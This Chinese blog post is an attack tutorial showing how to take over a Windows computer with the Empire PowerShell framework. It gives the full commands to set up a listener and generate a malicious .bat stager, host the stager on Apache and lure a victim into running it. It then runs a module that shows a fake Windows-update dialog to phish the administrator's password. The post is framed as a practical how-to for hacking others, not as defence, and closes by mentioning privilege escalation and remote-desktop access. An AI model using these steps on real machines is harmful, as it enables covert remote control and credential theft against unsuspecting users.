黑客如何通过一个bat文件控制整台计算机

图片[1]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

相关阅读

  • 电脑远控
  • 移动设备远控

视频讲解

之前我们分享过通过exe、pdf、word宏等文件方式远程控制计算机,今天我们带大家来了解Empire powershell后渗透框架,通过一个bat文件可以完成控制整台计算机……

图文讲解

本视频主要使用的是Empire powershell后渗透框架

安装Empire powershell框架

针对Kali linux(Debian内核)或者Ubuntu内核的Linux操作系统,需要输入下面的命令安装Empire powershell

如果是CentOs的则需要使用yum安装

sudo apt install powershell-empire
图片[2]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

启动Empire powershell服务端

powershell-empire server
图片[3]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

启动Empire powershell 客户端

powershell-empire client

使用http相关模块

uselistener http
图片[4]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

设置监听端口为4321

set Port 4321
图片[5]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

运行

execute

如果之前运行过会有相应的提示,我们则可以输入listeners进行展示

图片[6]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

然后使用windows/launcher_bat模块

usestager windows/launcher_bat
图片[7]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

设置为http监听

set Listener http

之后运行

execute

可以看到恶意的bat文件已经生成好了

图片[8]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

使用apache服务托管恶意文件

之后启动apache服务

sudo systemctl start apache2.service

然后将恶意bat文件拷入到apache的web服务路径下

sudo mv /var/lib/powershell-empire/empire/client/generated-stagers/launcher.bat /var/www/html/launcher.bat
图片[9]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

热心网友下载并运行恶意文件

托管完成后,我们就可以引导用户去下载恶意文件了,这个是内网的IP地址,您需要根据自己的实际情况进行修改

图片[10]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

然后保存好

图片[11]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

您可以双击进行运行

图片[12]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

然后你会发现很神奇的事情发生了,它消失了……

图片[13]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

回到kali linux上,可以看到我们已经成功连上了

图片[14]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

输入agents可以查看连接上的计算机的详细信息

图片[15]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

然后我们使用powershell/collection/toasted模块

usemodule powershell/collection/toasted
图片[16]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

然后进行参数的设置

set VerifyCreds True

Agent需要填写我们这里获取到的Name

图片[17]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog
set Agent Z74L2PBU

一切都设置好之后运行即可

execute
图片[18]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

之后回到windows电脑,你会发现,这里有一个很有趣的弹窗

图片[19]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

放大看,这里是提醒我们windows将在5分钟之后完成升级安装,如果我们点击重启

图片[20]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

则会发现出现了一个windows内置的窗口

图片[21]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

放大看,这里需要输入管理员账户和密码,才可以重启电脑……

图片[22]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

这时,如果热心网友输入了自己的账户和密码

图片[23]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

回到kali linux,我们可以看到通过钓鱼的方式,获取的账户和密码凭证

图片[24]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog

除此之外,视频中还演示了如何提权、如何打开远程桌面的操作,这里不再赘述,更多有趣的可以自行研究!

© 版权声明
THE END
喜欢就支持一下吧
点赞27赞赏 分享
评论 共14条

请登录后发表评论